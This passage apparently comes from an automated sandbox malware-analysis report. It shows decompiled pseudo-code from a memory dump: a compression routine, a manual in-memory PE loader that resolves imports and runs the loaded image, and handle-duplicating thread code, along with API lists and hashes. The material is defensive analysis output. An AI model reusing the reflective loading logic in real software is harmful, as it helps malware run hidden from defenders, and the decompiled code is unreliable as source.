						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E000D4AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E000D4C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E000D4AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x000d2d76
0x000d2d7b
0x000d2d7f
0x000d2d82
0x000d2d82
0x000d2d85
0x000d2d8a
0x000d2d8f
0x000d2d92
0x000d2d97
0x000d2d9a
0x000d2da0
0x000d2da0
0x000d2dab
0x000d2dae
0x000d2db5
0x000d2dba
0x00000000
0x00000000
0x000d2dc0
0x000d2dc5
0x000d2dc5
0x000d2dca
0x000d2dd0
0x000d2dda
0x000d2ddf
0x000d2de5
0x000d2e04
0x000d2e07
0x000d2e12
0x000d2e12
0x000d2e12
0x000d2e09
0x000d2e09
0x000d2e0b
0x00000000
0x000d2e0d
0x000d2e0d
0x000d2e0d
0x000d2e0b
0x000d2e1a
0x000d2e1f
0x000d2e24
0x000d2e2a
0x000d2e2e
0x000d2e31
0x000d2e34
0x000d2e3a
0x000d2e3f
0x000d2e42
0x000d2e48
0x000d2e4d
0x000d2e53
0x000d2e59
0x000d2e5e
0x000d2e61
0x000d2e66
0x000d2e6a
0x000d2e6e
0x000d2e71
0x000d2e74
0x000d2e7d
0x000d2e84
0x000d2e87
0x000d2e8a
0x000d2e8f
0x000d2e94
0x000d2e97
0x000d2e9a
0x000d2e9a
0x000d2e9e
0x000d2ea7
0x000d2eae
0x000d2eb1
0x000d2eb6
0x000d2ebb
0x000d2ebb
0x000d2ebe
0x000d2ec3
0x00000000
0x00000000
0x000d2de7
0x000d2de9
0x000d2df6
0x00000000
0x00000000
0x000d2df6
0x000d2de9
0x00000000
0x000d2de5
0x000d2ec9
0x000d2ece
0x000d2ed1
0x000d2ed4
0x000d2f7f
0x000d2f7f
0x000d2eda
0x000d2eda
0x000d2eda
0x000d2edf
0x000d2f09
0x000d2f0c
0x000d2f0c
0x000d2f11
0x000d2f13
0x000d2f15
0x000d2f18
0x000d2f1b
0x000d2f23
0x000d2f28
0x000d2f28
0x000d2f2e
0x000d2f31
0x000d2f34
0x000d2f37
0x000d2f39
0x000d2f39
0x000d2f3a
0x000d2f3a
0x000d2f37
0x000d2f48
0x000d2f4b
0x000d2f4f
0x000d2f54
0x000d2f57
0x000d2f5a
0x000d2f5a
0x000d2f5a
0x000d2f5d
0x000d2f5d
0x000d2f60
0x000d2f60
0x000d2ee1
0x000d2ee1
0x000d2ef1
0x000d2ef4
0x000d2ef9
0x000d2ef9
0x000d2efc
0x000d2eff
0x000d2f02
0x000d2f04
0x000d2f04
0x000d2f63
0x000d2f65
0x000d2f68
0x000d2f68
0x000d2f6e
0x000d2f72
0x000d2f75
0x000d2f77
0x000d2f77
0x000d2f88
0x000d2f8a
0x000d2f8a
0x000d2f92
0x000d2fa0
0x000d2fa3
0x000d2fa5
0x000d2fc5
0x000d2fc5
0x000d2fc8
0x000d2fce
0x000d2fcf
0x000d2fd2
0x000d2fd4
0x000d2fd7
0x000d2fda
0x000d2fdd
0x000d2fe1
0x000d2fe4
0x000d2fe7
0x000d2fea
0x000d2fec
0x000d2fec
0x000d2fef
0x000d2ff1
0x000d2ff1
0x000d2ff4
0x000d2ff6
0x000d2ff9
0x000d3001
0x000d3004
0x000d3009
0x000d3009
0x000d300f
0x000d3012
0x000d3015
0x000d3017
0x000d3017
0x000d3018
0x000d3018
0x000d3023
0x000d3023
0x000d3023
0x000d3026
0x000d3029
0x000d3029
0x000d302c
0x000d302c
0x000d2fef
0x000d302f
0x000d3032
0x000d3035
0x000d3037
0x000d303a
0x000d303c
0x000d303f
0x000d3042
0x000d3044
0x000d3047
0x000d304f
0x000d3057
0x000d305a
0x000d305a
0x000d305a
0x000d305d
0x000d305d
0x000d305d
0x000d3060
0x000d3066
0x000d3068
0x000d3068
0x000d306e
0x000d3074
0x000d307d
0x000d3084
0x000d3086
0x000d3089
0x000d3089
0x000d308c
0x000d308c
0x000d308f
0x000d3091
0x000d3094
0x000d3096
0x000d30b1
0x000d30b1
0x000d30b5
0x000d30b8
0x000d30bb
0x000d30be
0x000d30d4
0x000d30d4
0x000d30d4
0x000d30c0
0x000d30c0
0x000d30c2
0x000d30c6
0x000d30c9
0x00000000
0x000d30cb
0x000d30cb
0x000d30cd
0x00000000
0x000d30cf
0x000d30cf
0x000d30cf
0x000d30cd
0x000d30c9
0x000d30d8
0x000d30db
0x000d30e0
0x000d30ea
0x000d30ea
0x000d30ea
0x000d30ed
0x000d3098
0x000d3098
0x000d309a
0x000d30a1
0x000d30a1
0x000d30a3
0x000d30a5
0x000d30a7
0x000d30ab
0x000d30ad
0x000d30af
0x00000000
0x00000000
0x000d30af
0x000d30ab
0x000d309c
0x000d309c
0x000d309f
0x00000000
0x00000000
0x000d309f
0x000d309a
0x000d30f7
0x000d30f9
0x000d30f9
0x000d3104
0x000d2fa7
0x000d2fa7
0x000d2faa
0x00000000
0x000d2fac
0x000d2fac
0x000d2fae
0x000d2fb2
0x00000000
0x000d2fb4
0x000d2fb4
0x000d2fb4
0x000d2fb7
0x00000000
0x000d2fbb
0x000d2fc4
0x000d2fc4
0x000d2fb7
0x000d2fb2
0x000d2faa
0x000d2f96
0x000d2f9f
0x000d2f9f

APIs

memcpy.MSVCRT ref: 000D2E7D
memcpy.MSVCRT ref: 000D2EF4
memcpy.MSVCRT ref: 000D2F23
memcpy.MSVCRT ref: 000D2F4F
memcpy.MSVCRT ref: 000D3004

Part of subcall function 000D5D90: memcpy.MSVCRT ref: 000D5E6E

Part of subcall function 000D4AF0: memcpy.MSVCRT ref: 000D4B1A

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65

Uniqueness

Uniqueness Score: -1.00%

Function 000D2AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x000d2afb
0x000d2b01
0x000d2b0a
0x000d2b0d
0x000d2b10
0x00000000
0x000d2c01
0x000d2c05
0x000d2c07
0x000d2c15
0x000d2d33
0x000d2d3c
0x000d2d3f
0x000d2d43
0x000d2d49
0x000d2d51
0x000d2d51
0x000d2d59
0x00000000
0x000d2d64
0x000d2c1b
0x000d2c24
0x000d2c32
0x000d2c35
0x000d2c52
0x000d2c59
0x000d2c6b
0x000d2c6b
0x000d2c72
0x000d2c82
0x000d2c9a
0x000d2c84
0x000d2c8c
0x000d2c8c
0x000d2c9d
0x000d2ca1
0x000d2cb1
0x000d2cd4
0x000d2ce6
0x000d2cb3
0x000d2cc7
0x000d2cc7
0x000d2cf0
0x000d2d0c
0x000d2cf2
0x000d2d01
0x000d2d01
0x000d2d14
0x000d2d1d
0x000d2d1d
0x000d2d2b
0x00000000
0x000d2c74
0x000d2c76
0x00000000
0x000d2c76
0x000d2c72
0x00000000
0x000d2c35
0x000d2b18
0x000d2b26
0x000d2b2b
0x000d2b36
0x000d2b39
0x000d2b3d
0x000d2b3f
0x000d2b4f
0x000d2b58
0x000d2b61
0x000d2b69
0x000d2b72
0x000d2b7d
0x000d2b83
0x000d2b86
0x000d2b89
0x000d2b90
0x000d2b97
0x00000000
0x00000000
0x000d2ba2
0x000d2bb0
0x000d2bbb
0x000d2bc5
0x000d2bdd
0x000d2bea
0x000d2bea
0x000d2bc7
0x000d2bd2
0x000d2bd2
0x000d2bf1
0x000d2bf1
0x000d2bf9
0x000d2bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
LoadLibraryA.KERNEL32(?), ref: 000D2C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64

Uniqueness

Uniqueness Score: -1.00%

Function 000C1C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xde6dc; // 0x1d4
				_t13 = E000CA4BF(_t41, 0);
				while(_t13 < 0) {
					E000C980C( &_v28);
					_t43 =  *0xde6e0; // 0x0
					_t15 =  *0xde6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xde684; // 0x27bf8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xde6dc; // 0x1d4
						__eflags = 0;
						_t13 = E000CA4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xde6e8; // 0x27bffa8
				_v28 = _t20;
				_t22 = E000CA6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
					E000C980C(0xde6e0);
					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xde760);
						_t51 = 0x27;
						E000C9F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
				_t48 =  *0xde6dc; // 0x1d4
				 *0xde6d0 = 0;
				E000CA4DB(_t48);
				E000C861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x000c1c68
0x000c1c75
0x000c1c77
0x000c1c7e
0x000c1ce4
0x000c1c8b
0x000c1c90
0x000c1c96
0x000c1c9b
0x000c1ca1
0x000c1ca3
0x000c1ca7
0x000c1d15
0x000c1d17
0x000c1d99
0x000c1d9f
0x000c1d9f
0x000c1ca9
0x000c1cb1
0x000c1cb1
0x000c1cbd
0x000c1cc3
0x000c1cc5
0x00000000
0x00000000
0x000c1cc7
0x000c1cd1
0x000c1cd7
0x000c1cdd
0x000c1cdf
0x00000000
0x000c1cdf
0x000c1cab
0x000c1caf
0x00000000
0x00000000
0x00000000
0x000c1caf
0x000c1cee
0x000c1cef
0x000c1cf0
0x000c1cf1
0x000c1cf2
0x000c1cf7
0x000c1d01
0x000c1d06
0x000c1d0e
0x000c1d29
0x000c1d2c
0x000c1d36
0x000c1d41
0x000c1d54
0x000c1d56
0x000c1d58
0x000c1d5a
0x000c1d5b
0x000c1d63
0x000c1d64
0x000c1d6a
0x000c1d10
0x000c1d10
0x000c1d10
0x000c1d6b
0x000c1d76
0x000c1d79
0x000c1d7f
0x000c1d85
0x000c1d90
0x000c1d97
0x00000000

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
Opcode Fuzzy Hash: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766

Uniqueness

Uniqueness Score: -1.00%

Function 000C1B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000C1B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xde6f4; // 0x1d0
				_t12 = E000CA4BF(_t38, 0);
				while(_t12 < 0) {
					E000C980C( &_v28);
					_t40 =  *0xde700; // 0x0
					_t14 =  *0xde704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xde684; // 0x27bf8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xde684; // 0x27bf8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xde6f4; // 0x1d0
								__eflags = 0;
								_t12 = E000CA4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E000C980C(0xde700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xde6e8; // 0x27bffa8
				_v28 = _t24;
				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xde760);
					_t48 = 0x27;
					E000C9F06(_t48);
				}
				if(_v24 != 0) {
					E000C6890( &_v24);
				}
				_t26 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
				_t28 =  *0xde758; // 0x0
				 *0xde6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xde6f4; // 0x1d0
				 *0xde758 =  !=  ? 1 : _t28;
				E000CA4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x000c1b2d
0x000c1b33
0x000c1b41
0x000c1baf
0x000c1b4e
0x000c1b53
0x000c1b59
0x000c1b5e
0x000c1b64
0x000c1b66
0x000c1b6a
0x000c1c64
0x000c1c64
0x000c1b70
0x000c1b70
0x000c1b7c
0x000c1b7c
0x000c1b88
0x000c1b8e
0x000c1b90
0x00000000
0x000c1b92
0x000c1b92
0x000c1b9c
0x000c1ba2
0x000c1ba8
0x000c1baa
0x00000000
0x000c1baa
0x000c1b72
0x000c1b72
0x000c1b76
0x00000000
0x00000000
0x00000000
0x00000000
0x000c1b76
0x000c1b70
0x000c1c5d
0x000c1c63
0x000c1c63
0x000c1bb8
0x000c1bcc
0x000c1bcf
0x000c1bd9
0x000c1be5
0x000c1bef
0x000c1bf0
0x000c1bf1
0x000c1bf2
0x000c1bf7
0x000c1c00
0x000c1c04
0x000c1c06
0x000c1c07
0x000c1c0f
0x000c1c10
0x000c1c16
0x000c1c1b
0x000c1c21
0x000c1c21
0x000c1c26
0x000c1c31
0x000c1c34
0x000c1c3c
0x000c1c48
0x000c1c4b
0x000c1c51
0x000c1c56
0x000c1c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
DuplicateHandle.KERNEL32 ref: 000C1BD9

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

